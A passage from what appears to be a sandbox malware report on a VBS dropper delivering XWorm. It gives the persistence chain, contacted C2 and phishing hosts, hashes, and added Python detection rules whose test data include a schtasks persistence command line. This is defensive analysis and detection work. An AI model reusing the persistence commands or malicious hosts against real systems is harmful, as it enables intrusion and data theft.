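    """Return (line_no, parsed_beacon) for every log line containing a Bot API URL."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        for url in re.findall(r"https?://\S+", line):
            parsed = parse_telegram_beacon(url)
            if parsed:
                hits.append((n, parsed))
    return hits


# Constructed proxy-log lines (assumption); the first two URLs are the benign
# ones from the report, the third is the observed XWorm check-in.
SAMPLE_LOG = [
    "2024-10-06T14:45:11Z 10.0.0.5 GET http://ip-api.com/line/?fields=hosting 200",
    "2024-10-06T14:45:11Z 10.0.0.5 GET http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name 404",
    "2024-10-06T14:45:12Z 10.0.0.5 GET " + XWORM_URL + " 200",
]

if __name__ == "__main__":
    for n, hit in find_bot_api_calls(SAMPLE_LOG):
        print(f"line {n}: bot {hit['bot_id']} chat_id {hit['chat_id']} {hit['banner']}")
        for k, v in hit["fields"].items():
            print(f"    {k}: {v}")
```

Matching on the `/bot<id>:<secret>/` path rather than on the host alone keeps legitimate Telegram client traffic out of the hit list, and the extracted token plus chat_id are the two values worth pivoting on across other samples, since the same bot tends to be reused by one operator.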
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
45.88.91.147 | isika.ddns.net | Bulgaria | 10753 | LVLT-10753US | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1526836
                              Start date and time:2024-10-06 16:44:07 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 45s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:SOA-injazfe-10424.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winVBS@12/9@6/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.189.173.22
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • VT rate limit hit for: SOA-injazfe-10424.vbs
Time | Type | Description
10:45:09 | API Interceptor | 2950581x Sleep call for process: WindowsApp.exe modified
12:21:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
16:45:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run task C:\Users\user\AppData\Roaming\task.exe
16:45:10 | Task Scheduler | Run new task: task path: C:\Users\user\AppData\Roaming\task.exe
16:45:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run task C:\Users\user\AppData\Roaming\task.exe
18:20:11 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk
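The behavior graph and the autostart timeline together give the whole chain: wscript.exe drops and starts WindowsApp.exe from Local\Temp, WindowsApp.exe drops task.exe into Roaming, registers it through schtasks.exe, an HKCU Run value and a Startup-folder shortcut. The following Python is an added example, not code from the report: it runs detection logic for exactly those four steps over constructed process-creation and autostart records. The record field names (Image, ParentImage, CommandLine, Location, Target), the schtasks command line and the shortcut's target are assumptions; the paths are the ones the report lists.

```python
"""Triage rules for the wscript -> WindowsApp.exe -> task.exe chain.

Added example (not part of the Joe Sandbox report).  The events are
constructed to mirror the report; field names, the schtasks command line and
the .lnk target are assumptions.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# user-writable staging directories used by this sample: %LOCALAPPDATA%\Temp and %APPDATA%
USER_WRITABLE_RE = re.compile(
    r"\\users\\[^\\]+\\appdata\\(?:local\\temp|roaming)\\", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _schtasks_target(cmdline):
    """Return the program named by /tr in a schtasks command line, or None."""
    m = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def triage_process(ev):
    """Findings for one process-creation event (Image, ParentImage, CommandLine)."""
    findings = []
    parent = _basename(ev["ParentImage"])
    image = ev["Image"]
    cmd = ev.get("CommandLine", "")
    if parent in SCRIPT_HOSTS and USER_WRITABLE_RE.search(image):
        findings.append("script host started a PE from a user-writable directory")
    if _basename(image) == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        target = _schtasks_target(cmd)
        if target and USER_WRITABLE_RE.search(target):
            findings.append("schtasks /create with /tr inside AppData")
    return findings


def triage_autostart(entry):
    """Findings for one autostart entry (Location = Run value or .lnk path, Target = program)."""
    findings = []
    loc, target = entry["Location"], entry["Target"]
    if re.search(r"\\CurrentVersion\\Run\\", loc, re.I) and USER_WRITABLE_RE.search(target):
        findings.append("Run key value points into AppData")
    if re.search(r"\\Programs\\Startup\\[^\\]+\.lnk$", loc, re.I) and USER_WRITABLE_RE.search(target):
        findings.append("Startup-folder shortcut points into AppData")
    return findings


# Constructed events (assumption); paths are the ones the report records.
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Users\user\AppData\Local\Temp\WindowsApp.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\WindowsApp.exe"'},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\WindowsApp.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign control event
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]
AUTOSTART_ENTRIES = [
    {"Location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\task",
     "Target": r"C:\Users\user\AppData\Roaming\task.exe"},
    {"Location": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk",
     "Target": r"C:\Users\user\AppData\Roaming\task.exe"},
    {"Location": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",  # benign control entry
     "Target": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]


def run_triage(process_events=PROCESS_EVENTS, autostart_entries=AUTOSTART_ENTRIES):
    """Return every finding as a (source, finding) pair, in input order."""
    out = []
    for ev in process_events:
        out += [(ev["Image"], f) for f in triage_process(ev)]
    for entry in autostart_entries:
        out += [(entry["Location"], f) for f in triage_autostart(entry)]
    return out


if __name__ == "__main__":
    for src, finding in run_triage():
        print(f"{finding}: {src}")
```

Each rule keys on the combination the report shows (a script-host parent plus a user-writable image path, a schtasks /create whose /tr lands in AppData, a Run value or Startup shortcut whose target lands in AppData) rather than on the file name task.exe, so a renamed second stage still trips it while the two benign control records do not.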
Match | Associated Sample Name / URL | Detection | Threat Name | Context (the SHA 256 and Link columns held only "Get hash" / "Browse" links)
208.95.112.1 | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
208.95.112.1 | BootstrapperV1.19.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | NewLoaderCracks_1.32.exe | malicious | DCRat | ip-api.com/line/?fields=hosting
208.95.112.1 | SolaraV3.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | SolaraV3.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | SolaraV4.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | enigma.tech.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | POP.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | gp4uQBDTP8.exe | malicious | Xehook Stealer | ip-api.com/json/?fields=11827
149.154.167.220 | Quote_ECM129_ Kumbih III.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | INVOICE-COAU7230734290.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | -
149.154.167.220 | Bukti-Transfer...exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | SolaraV3.exe | malicious | Blank Grabber | -
149.154.167.220 | SolaraV4.exe | malicious | Blank Grabber | -
149.154.167.220 | yvDk2VZluODBu6S.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Payment Advice Note.exe | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Confirmation transfer AGS # 03-10-24.scr.exe | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Urgent inquiry for quotation.exe | malicious | Snake Keylogger, VIP Keylogger | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 208.95.112.1
ip-api.com | BootstrapperV1.19.exe | malicious | XWorm | 208.95.112.1
ip-api.com | NewLoaderCracks_1.32.exe | malicious | DCRat | 208.95.112.1
ip-api.com | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | SolaraV4.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | enigma.tech.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | POP.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | gp4uQBDTP8.exe | malicious | Xehook Stealer | 208.95.112.1
api.telegram.org | Quote_ECM129_ Kumbih III.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | INVOICE-COAU7230734290.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 149.154.167.220
api.telegram.org | Bukti-Transfer...exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SolaraV3.exe | malicious | Blank Grabber | 149.154.167.220
api.telegram.org | SolaraV4.exe | malicious | Blank Grabber | 149.154.167.220
api.telegram.org | yvDk2VZluODBu6S.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Payment Advice Note.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Confirmation transfer AGS # 03-10-24.scr.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Urgent inquiry for quotation.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | https://bitvavo635.com/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | http://distrosourcess8.sg-host.com/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | http://peru-spost.shop/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://goteleg-br.top/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | http://telexxx-hot.vercel.app/ | malicious | Porn Scam | 149.154.167.99
TELEGRAMRU | Quote_ECM129_ Kumbih III.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | INVOICE-COAU7230734290.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 149.154.167.220
TELEGRAMRU | Bukti-Transfer...exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | SolaraV3.exe | malicious | Blank Grabber | 149.154.167.220
LVLT-10753US | kUiqbpzmbo.exe | malicious | XWorm | 178.215.236.225
LVLT-10753US | yakov.x86.elf | malicious | Mirai | 168.215.26.13
LVLT-10753US | Scan_doc_09_16_24_1120.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | Scan_doc_09_16_24_1203.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | Scan_doc_09_16_24_1120.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | Scan_doc_09_16_24_1203.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | VD01NDHM8u.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | vovE92JSzK.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | s9POKY8U8k.exe | malicious | ScreenConnect Tool | 178.215.236.119
LVLT-10753US | xkIXA8M8sC.exe | malicious | ScreenConnect Tool | 178.215.236.119
TUT-ASUS | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 208.95.112.1
TUT-ASUS | BootstrapperV1.19.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | NewLoaderCracks_1.32.exe | malicious | DCRat | 208.95.112.1
TUT-ASUS | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | SolaraV4.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | Aviso de cuenta vencida de DHL - 1606622076_865764325678976645423546567678967564423567890008765.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | enigma.tech.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | POP.js | malicious | WSHRAT | 208.95.112.1
TUT-ASUS | gp4uQBDTP8.exe | malicious | Xehook Stealer | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://pub-41ef3c62dc9e48a1b995d776997077b7.r2.dev/index.html | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4= | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://bdg.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/password | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://ranjitkumarmehta1.github.io/netflix/ | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://chattts-49f1.beszyrecala.workers.dev/f9f981ac-a3fc-46ec-96fe-22= | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://business-center-helper.com/952267306393179 | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://pub-c8190d91acc14cf6b49ba44dafc171ae.r2.dev/index.html | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://pub-a3d3fc2664c9440a88e6fe93d30517c5.r2.dev/index.html | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://pub-0c716a0b84164eff88c26766fe5472d7.r2.dev/index.html | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://pub-f53c4a7a705a47b79ff74d8c24977253.r2.dev/index.html | malicious | HTMLPhisher | 149.154.167.220
                                                  No context
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):1.4596810633484414
                                                  Encrypted:false
                                                  SSDEEP:192:xXWGc6cGxAD0nk1IHYaW4UrZjC6lUCGwezuiFVZ24lO8L6q:hW16Tnk1vaQtjtUkezuiFVY4lO8O
                                                  MD5:A81209B884B5862BB4647DC4374F0468
                                                  SHA1:CFCB4A13F97DB3C620841C2EF44DBF8C5C592FBB
                                                  SHA-256:2EEA8D89114BBF48C49533FEE65246019B30BCB2CCCEF3D2AD24C60D918FC50C
                                                  SHA-512:09BAC851CC4CDB4D6110BC78AFC22BA4F689BAFD6CEAA3B4D167C97818F0AF16FBEF9EE7394E1B7C3E33BA8C6E708D5C2254536D185004AAB8789042D6CE4696
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.0.5.2.8.4.8.6.4.4.8.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.0.5.2.8.6.1.1.4.4.7.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.c.4.a.5.3.a.-.0.b.6.e.-.4.f.3.0.-.8.b.2.6.-.7.0.b.8.3.5.a.7.8.d.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.5.5.2.3.8.d.-.d.0.4.1.-.4.f.9.1.-.8.5.f.5.-.0.3.a.3.8.0.8.7.b.b.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.A.p.p...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.e.g.g.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.b.4.-.0.0.0.1.-.0.0.1.4.-.5.b.e.1.-.7.0.5.3.f.e.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.c.6.1.4.b.a.a.f.f.c.3.6.6.8.0.6.4.f.f.6.7.6.4.f.2.9.5.f.e.b.c.0.0.0.0.0.0.0.0.!.0.0.0.0.3.d.8.e.1.4.4.5.9.f.4.c.0.4.0.2.a.8.c.9.d.c.a.0.f.4.3.3.6.b.f.e.9.a.9.f.5.a.5.c.!.W.i.n.d.o.w.s.A.p.p...e.x.e...
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:Mini DuMP crash report, 16 streams, Sun Oct 6 16:21:25 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):822832
                                                  Entropy (8bit):2.966052473583583
                                                  Encrypted:false
                                                  SSDEEP:6144:X/dSfWY6n+01TzC/Lqm54L3QQALoLTJe:vdrYo6/LqmyQQALwTJ
                                                  MD5:35D2712CDEBDDCAD479D5F2C91232901
                                                  SHA1:4C83596CE20502B756954F667381BEA49C5AE65A
                                                  SHA-256:0E4ECAEAF9DE875AC96C30C25F2F6000D6990A6BB9A3186C56920E565AD1C9B1
                                                  SHA-512:DE7F02E0347DBC2A7A645A2B0A262C53D49483021DC71AF4A6BFA7E46ED1C04577CA874A8271A2655D2B8CFE620D32E126E92908135711C45C3AB6346B40472B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... ..........g............t...........P,..........,....8....... ...:.......n..&...........l.......8...........T...............8............Z...........\..............................................................................eJ...... ]......Lw......................T...........n..g....'........................ ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):9136
                                                  Entropy (8bit):3.70159299089223
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJxeHX86Y6QriargmfZC76prL89baQr/if4em:R6lXJIs6Y9riargmfM7a0/if4
                                                  MD5:966A26FA4FD70ACDB67ACD8A7286FCCD
                                                  SHA1:DDE24149314465B315073AEB45766F57C6A42B3D
                                                  SHA-256:A80E03C7600DA4CE6FB154F115268E0B44C9D907BD115B011BA854ED87CCEA64
                                                  SHA-512:87F3B4D1A6BC9B416D5DE0CDC7A0FABBA93CCC6ED9342240059B762A520A1D52A0E588F6DCC27F43E01EBC63BF6E48C41F64BE50DE9E5F4A6247973F4696A3CD
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.0.4.<./.P.i.
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4772
                                                  Entropy (8bit):4.443261669916678
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsvJg771I9C9WpW8VYYYm8M4J/3F4yq8vNeAHP2BZd:uIjfRI7tM7VIJ6W1HP2BZd
                                                  MD5:6257EAB639236028324D5A1517477509
                                                  SHA1:E962DE70803B8DB8AF82F25783F9FECF4FCA648C
                                                  SHA-256:9AD766448D5452CCA8C55C911A4B1099652C4692F2C8EA5779023426E0053399
                                                  SHA-512:0F0872CF8724807C4CD638E6CBA1B33872A160FB5E9B08D1A5A95E1E9EA669C72AACED2A37AB8DCB12D17BE5832FA310D81CE8ECA1C824C0F03CF7C06C4D6C66
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="531804" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Users\user\AppData\Roaming\task.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                  File Type:Generic INItialization configuration [WIN]
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):3.6722687970803873
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                  MD5:DE63D53293EBACE29F3F54832D739D40
                                                  SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                  SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                  SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):220160
                                                  Entropy (8bit):7.837208956478675
                                                  Encrypted:false
                                                  SSDEEP:6144:Ea2q0ShjvylwVJMRNKvXo1zKENuKOmFUA23:hDhj6lwmQvY1zJNuIGl3
                                                  MD5:0C3A47BC813554D40583861DDCDE06B8
                                                  SHA1:3D8E14459F4C0402A8C9DCA0F4336BFE9A9F5A5C
                                                  SHA-256:27F0C4307847174E4D202AC189C9D316EE72451A0B6D5338EB6F3276D5C5ADFA
                                                  SHA-512:6A049F521892AD387466616F774763A6FD522605E0E3B21D6B18E8AFA7644D92B1DE8739F62C584AACAEC9A043383EDD340707C5CC200E5027F5583E2E85CC67
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.g.........."...0...................... ....@.. ....................................@.................................."..K.......................................................................................................H...........dCoc.B{...... ......................@....text... ........................... ..`.rsrc................R..............@..@.....................X.............. ..`.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 6 13:45:08 2024, mtime=Sun Oct 6 13:45:08 2024, atime=Sun Oct 6 13:45:08 2024, length=220160, window=hide
                                                  Category:dropped
                                                  Size (bytes):751
                                                  Entropy (8bit):5.066900684635211
                                                  Encrypted:false
                                                  SSDEEP:12:8nbMO4HTN+2ChCi1Y//Y8LHGjAgiNHldYJUJzBmV:86Hw219naA1YJUJtm
                                                  MD5:C5B2FAEE5659A058EB72F76ED58097B6
                                                  SHA1:3489CC42541D3A2DBF871519A61B4BA7EB53F909
